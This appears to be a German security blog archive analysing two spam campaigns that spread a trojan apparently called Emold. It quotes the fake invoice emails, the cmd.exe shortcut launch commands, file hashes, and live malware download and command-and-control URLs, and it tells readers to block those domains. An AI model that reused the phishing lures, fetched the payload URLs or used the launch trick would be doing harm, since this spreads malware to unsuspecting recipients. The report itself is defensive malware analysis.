Tag Archive for 'univnext.cn'

Emold: abrechnung.zip

Seit heute Nachmittag kurz nach 14:30 Uhr verbreitet sich ein noch unbekannter Trojaner per Spam-E-Mail:

Betreff: Abrechnung 59745458055

Sehr geehrte Damen und Herren!
Die Anzahlung Nr.257406245440 ist erfolgt
Es wurden 8121.00 EURO Ihrem Konto zu Last geschrieben.
Die Auflistung der Kosten finden Sie im Anhang in der Datei: Abrechnung.

Regel Inkasso GmbH & Co. KG
Fredeburger Str. 21
33699 Bielefeld

Postfach 51 20 05
33698 Bielefeld

Tel.: 0521 93212-0
Fa x: 0521 92412-15

AG Bielefeld HRA 13169
Steuer-Nummer: 349/5749/0377

Komplementargesellschaft:
Regel Verwaltungs-GmbH
AG Bielefeld HRA 34932

Die erwähnte Inkasso Firma Regel Inkasso GmbH & Co. KG ist jedoch viel mehr Opfer als Täter- Der Absender ist nämlich gefälscht.

Die Nummer im Betreff sowie die Anzahlungsnummer (Anzahlung Nr.) und der EURO Betrag im E-Mail Text variieren. Im Attachement abrechnung.zip befindet sich ein derzeit noch unbekannter Trojaner. Der Trojaner ist in der Datei scann.a im Attachement abrechnung.zip versteckt. Der Trojaner lässt sich jedoch nur über die ebenfalls im Attachement vorhandene Verknüpfung abrechnung.lnk ausführen, welche die Datei scann.a im Ordner scan via cmd.exe ausführt:

%windir%\system32\cmd.exe /c scann\scann.a

Mit einem Klick auf die Verknüpfung , wird der eigentliche Trojaner ausgeführt:

Filename: scann.a
File size: 26112 bytes
MD5…: b2f27d1b598d46998eda3a12ddfe140e
SHA1..: ee18628238725d3938c8810b8d019cfc8401aca7
Erkennungsrate: 3/37 (8.11%)

Die Erkennungsrate des Trojaners ist äusserst schlecht. Es handelt sich dabei jedoch höchstwahrscheinlich um Emold / AutoRun. Nach der Infektion kontaktiert er die uns von früher bereits bekannte Domain univnext.cn (218.93.202.102 CHINANET-JS):

GET http://univnext.cn/ld.php?v=1=rs

Das Attachement sollte auf keinen Fall geöffnet werden. Des Weiteren sollten Unternehmen den Zugriff auf univnext.cn (218.93.202.102) an Ihren Gateways unterbinden.

UPDATE 15:52 Uhr

Der vom Trojaner Kontaktierte Server (218.93.202.102) scheint auch noch andere Webseiten zu hosten:

  • absoluts.org
  • murakamus.cn
  • univnext.cn
  • suspended-domain.ru
  • mangust32.cn
  • liveinternetstatistics.ws
  • linenetz.com
  • usersoftware.in
  • Die Webseiten hosten teilweise Konfigurationsdateien von unserem Freund WSNPoem sowie verschiedene Drive-By exploits. Es empfiehlt sich also auch hier, den Zugriff auf die oben genannten Domains zu blockieren.

    UPDATE 22:07 Uhr

    Nach einer weile scheint der Trojaner auf Kommando weiteren Schadcode von topdirectory.info (216.246.45.76 – HostForWeb Inc.) nach zu laden:

    GET http://topdirectory.info/bobunger2006/z.exe

    Filename: z.exe
    File size: 43249 bytes
    MD5…: 86838c10f0f87876c267c20a3ae2241e
    SHA1..: 975bce9fa4fbb0a1946c1f24bcce91846e47e7e8
    Erkennungsrate: 2/37 (5.41%)

    Die Erkennungsrate bei der nachgeladenen Datei (z.exe) ist noch schlechter als beim Trojaner selbst (scann.a). Der nun nachgeladene Trojaner kontaktiert ebenfalls regelmässig eine weitere Domain:

    mssrv10256.com 91.207.117.251 (MEGATECH-NET, Russia)

    GET http://mssrv10256.com/IT03/get.php

    Erneut gilt es, den Zugang zu den folgende Domains zusätzlich zu blockieren:

  • mssrv10256.com (91.207.117.251)
  • topdirectory.info (216.246.45.76)
  • zertifikat.ssl – Emold?

    Seit heute Nacht kurz nach 00:00 Uhr verbreitet sich ein noch unidentifizierter Trojaner (Emold?) über ein Spam-Welle:

    Betreff: Lastschrift
    Guten Tag!
    Ihr Abbuchungsauftrag Nr.06660022 wurde erfullt.
    Ein Betrag von 760.52 EURO wurde abgebucht und wird in Ihrem Bankauszug als “Vattenfallabbuchung ” angezeigt.
    Die Auflistung der Kosten finden Sie im Anhang in der Datei: Rechnung.

    Alle unsere Rechnungen sind mit einem Sicherheitszertifikat versehen – der ist fuer Sie nicht von Bedeutung

    Vattenfall Europe AG
    Chausseestra?e 23
    10115 Berlin

    Vertretungsberechtigter: Karl Treumeier
    Umsatzsteuerident-Nummer: DR123052388
    Handelsregisternummer HRB 74215B

    Der Betreff variiert:

  • Lastschrift
  • Inkasso
  • Ratenzahlung
  • Abbuchung erfolgt
  • Abbuchung
  • Amtsgerticht
  • Amtsgericht Koeln
  • Forderungsmanagement GmbH
  • 1 Rate
  • Der EURO Betrag sowie die Anzahlungs Nr. variieren ebenfalls. Im Attachement Rechnung.zip befinden sich zwei Dateien:

    Rechnung.txt
    zertifikat.ssl

    Bei der Datei Rechnung.txt handelt es sich bloss um eine Verknüpfung auf die Datei zertifikat.ssl, welche den eigentlichen Trojaner beinhaltet. Die Datei wird über die Verknüpfung mittels cmd.exe ausgeführt:

    %windir%\system32\cmd.exe /c zertifikat.ssl
    Filename: zertifikat.ssl
    MD5: 57127815d6864a495151e49c7bf7d192
    SHA1: 43a8e686d45c636f1260651ff29abb1a399d3933
    Erkenungsrate: 5/36 (13.89%)

    Nach der Infizierung nimmt der Trojaner Kontakt mit der Domain univnext.cn (218.93.202.102) auf:

    GET http://univnext.cn/ld.php

    Das Attachement sollte auf keinen Fall geöffnet werden. Des Weiteren gilt es, die Domains zu blockeiren:

  • univnext.cn
  • regect.mobi
  • UPDATE 10:44 Uhr

    Der Trojaner scheint noch weiteren Schadcode nach zu laden:

    GET http://regect.mobi/02.exe

    Filename: 02.exe
    File size: 45297 bytes
    MD5…: b8750fa07487b47dc6e1ae54347ddbcb
    SHA1..: 9c584d8cadc7fa47e2d2f647c3310571fe72816d
    Erkennungsrate: 8/36 (22.23%)




    economics-recluse
    Scene
    Urgent!